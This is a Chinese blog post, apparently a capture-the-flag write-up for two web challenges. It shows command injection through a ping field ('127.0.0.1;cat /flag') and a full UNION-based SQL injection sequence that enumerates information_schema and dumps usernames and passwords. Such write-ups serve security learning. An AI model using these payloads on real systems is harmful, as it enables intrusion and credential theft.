web 8.exec 9.loveSQL

于 2021-08-20 17:41:58 发布
阅读量100 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu_jing_hong/article/details/119827676
版权

8.exec

先Ping一下127.0.0.1 ,得到回显

 

 输入  127.0.0.1;ls /  获得根目录

看到有flag文件,输入127.0.0.1;cat /flag获取flag

flag{2093b9f0-e3cf-4ab0-beed-bf9f20e772e9}

 9.loveSQL

先试用万能密码登录

得到了

 

尝试MD5解密发现查询不到,那么看看 是否存在注入,首先查看字段数,在url中分别输入

/check.php?username=admin' order by 3%23&password=1

/check.php?username=admin' order by 4%23&password=1

 看到当输入/check.php?username=admin' order by 4%23&password=1时存在报错,那么就共有3个字段。

然后用union查询测试注入点

在url上输入/check.php?username=1' union select 1,2,3%23&password=1

得到回显点位为2和3,查询当前数据库名 

 输入/check.php?username=1' union select 1,database(),version()%23&password=1

 可知数据库名为geek,再进行爆表

输入/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到两个表,分别再爆字段。

输入/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

这里是选择的是l0ve1ysq1'这个表

得到三个字段,再爆数据

输入/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

得到flag{1093175d-d9c1-440c-be99-63ca665cc930} 

 

yu_jing_hong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
8_16.c-->exec
YOU CAN IF YOU BELIEVE YOU CAN
10-27 282
只是取到了一个参数呀。 shell下执行which and echo , They will display the results of two parameters. file /tmp 8_16.c /tmp:           directory 8_16.c:         c program text     1  #include "apue.h"      2  #
linux命令 exec
u010914684的专栏
07-04 804
exec命令可以通过文件标识符打开或挂
linux 重定向、exec实现访问百度主页
weixin_43294560的博客
11-06 1389
文件描述符 0 输入流 1 正确输出流 2 报错输出 重定向和文件描述符之间不能有空格 输出流: 重定向(>>,追加模式) ls -l / 1>>ls.txt 将根目录输出到ls.txt文件 覆盖重定向(>) ls -l / 1> ls.txt 将etc中的内容输出到ls.txt文件并覆盖原文件内容 报错输出 ls -l /god ...
Shell I/O重定向与exec的使用介绍
changdizm的博客
11-03 463
①I/O重定向的常用用法 符号 意义 cmd1 | cmd2 管道符,将cmd1的标准输出作为cmd2的标准输入。 filename 将标准输出写到文件filename之中。 < filename 将文件filename的内容读入到标准输入之中。 filename 将标准输出写到文件filename之中,若filename文件...
学习Linux(十) 脚本编程
赵俊杰
08-23 342
shell bash 是一种解释器、启动器。 将文件中写一些我们常用的命令 如 ll / echo"abcd" echo $$ 然后执行source 文件名称。发现这些命令都执行了 且bash进程号一致。所以说source 是在当前bash进程执行程序(. 文件名称也一样 这时.=source)。所以说bash具有读取文件的能力。 还有一种/bin/bash 文件名 这样虽然也执行但是这种方...
python例程1.exec动态生成控件.7z
07-19
"exec动态生成控件"这个概念涉及到的是如何在程序运行时根据需要创建和控制用户界面元素。让我们深入探讨一下这个主题。 首先,我们要明白在Python中创建GUI通常会使用一些库,如Tkinter、PyQt、wxPython或Kivy等。...
Veritas.Backup.Exec.21.0补丁文件
07-15
Veritas.Backup.Exec.21.0补丁文件,正常安装后,运行补丁文件在启动软件即可
vbScript中WScript.Shell对象的run和exec使用心得分享
09-06
在VBScript中,WScript.Shell对象是用于与操作系统交互的重要工具,它提供了两种执行命令的方法:`Run`和`Exec`。这两种方法各有特点,适用于不同的场景。 首先,让我们详细了解一下`Run`方法。`Run`方法的主要作用...
关于IE的RegExp.exec的问题
10-29
问题:"A[B]C[D]E[F]G"将其分为两个数组,分别是 ACEG 和 [B][D][F].
【hive on spark Error】return code 30041 from org.apache.hadoop.hive.ql.exec.spark.SparkTask.
01-07
ERROR : FAILED: Execution Error, return code 30041 from org.apache.hadoop.hive.ql.exec.spark.SparkTask. 前言报错信息异常分析配置改动后记 前言 在成功消除Cloudare管理界面上那些可恶的警告之后,我又对yarn...
exec控制 文件操作符
xuhongning的专栏
02-17 1730
<br />exec是shell的一个built-in command,一般用来execute某个command,然后退出该command,注意这里不是fork一个子shell,然后用该子shell来执行command,而是在当前shell上直接执行该command,所以command退出后,该shell也就结束了。 <br />exec的另外一个功能是打开和关闭文件描述符,文件符range是0-9. <br />因为0是标准输入,1是标准输出,2是标准错误,所以没有特别缘由,我们使用3-9. <br />
shell 特殊变量
bigNoseLiu的专栏
08-12 8742
<br />表格 B-1. 特殊的shell变量<br />变量含义$0脚本名字$1位置参数 #1$2 - $9位置参数 #2 - #9${10}位置参数 #10$#位置参数的个数"$*"所有的位置参数(作为单个字符串) *"$@"所有的位置参数(每个都作为独立的字符串)${#*}传递到脚本中的命令行参数的个数${#@}传递到脚本中的命令行参数的个数$?返回值$$脚本的进程ID(PID)$-传递到脚本中的标志(使用set)$_之前命令的最后一个参数$!运行在后台的最后一个作业的进程ID(PID)<br />
计算机网络学习笔记(一)——明白通信原理
JohnnyLin
06-11 327
互联网通信原理 exec 9 <> /dec/tcp/www.baidu.com/80 解释: 9:新建的文件描述符 相当于Java中的变量名 <>:标准输入输出流 , <表示输出 , > 表示输入 /dec/tcp/www.baidu.com/80 : 表示路径,Linux中一切皆文件 echo -e "hello world\n" 解释: echo: 输出到屏幕. -e: 使得其识别转义字符 不加-e则原样输出\n 因此向屏幕打印 hello world 后换
linux exec 脚本之家,exec命令在shell脚本中有什么用处?
weixin_39684235的博客
05-01 358
exec内核中的内置命令镜功能,还有他们家的基础上execve,这通常是由被称为C.exec无需fork新流程即可替换当前流程中的当前程序。在你编写的每个剧本中都不会使用它,但它偶尔会派上用场。以下是我使用过的一些场景;我们希望用户在不访问shell的情况下运行特定的应用程序。我们可以在/ etc / passwd中更改登录程序,但也许我们希望从启动文件中使用环境设置。所以,在(比方说)中.pr...
2020-12-08
myidea999的博客
12-08 997
Linux exec 浏览页面 打开socket链接 exec replace command <> 输入输出 到文件描述符8 /dev/tcp 并不存在这个目录 **exec 8<> /dev/tcp/www.baidu.com/80 **echo -e "GET / HTTP/1.0\n" 1>&8 -e 转义 \n 换行符 http1.0规定请求头要换行 &8 固定语法 &表示 exec 8>& - 关闭 1...
exec使用方法
笔者从事电信媒体开发多年,愿意将多年的开发经验分享给同行
04-22 2495
<br /><br />exec program<br />将 program 程序替代当前程序进程.<br />这就意味着 exec 后面再跟任何命令都是没有意义的, 因为他们永远得不到执行<br />===================================<br />可以用 exec 命令来关闭标准输入, 然后再以任何从中读取的文件重新打开<br />要把标准输入改变到文件, 用以下的格式的exec命令 exec < file<br />以后任何从标准输入读数据的命令都会从file中读取<
Linux系统exec命令
be happy
01-15 9127
shell的内建命令exec将并不启动新的shell,而是用要被执行命令替换当前的shell进程,并且将老进程的环境清理掉,而且exec命令后的其它命令将不再执行。  因此,如果你在一个shell里面,执行exec ls那么,当列出了当前目录后,这个shell就自己退出了,因为这个shell进程已被替换为仅仅执行ls命令的一个进程,执行结束自然也就退出了。为了避免这个影响我们的使用,一般将exe
shell浅谈之八I/O重定向
乌托邦
09-24 7900
一、简介       I/O重定向用于捕获一个文件、命令、程序或脚本甚至代码块的输出,然后把捕获到的输出作为输入发送给另外一个文件、命令、程序或脚本等。I/O重定向最常用的方法是管道(管道符"|")。 二、详解 1、管道 (1)管道技术是Linux间的一种通信技术,利用先进先出排队模型来指挥进程间的通信(可当作连接两个实体的一个单向连接器)。Linux管道可用于应用程序之间
android8 Runtime.getRuntime().exec
最新发布
08-13
因此,根据您的问题"android8 Runtime.getRuntime().exec",您可以使用以下代码来执行命令或创建进程: ```java Runtime runtime = Runtime.getRuntime(); String command = "your_command_here"; try { Process ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值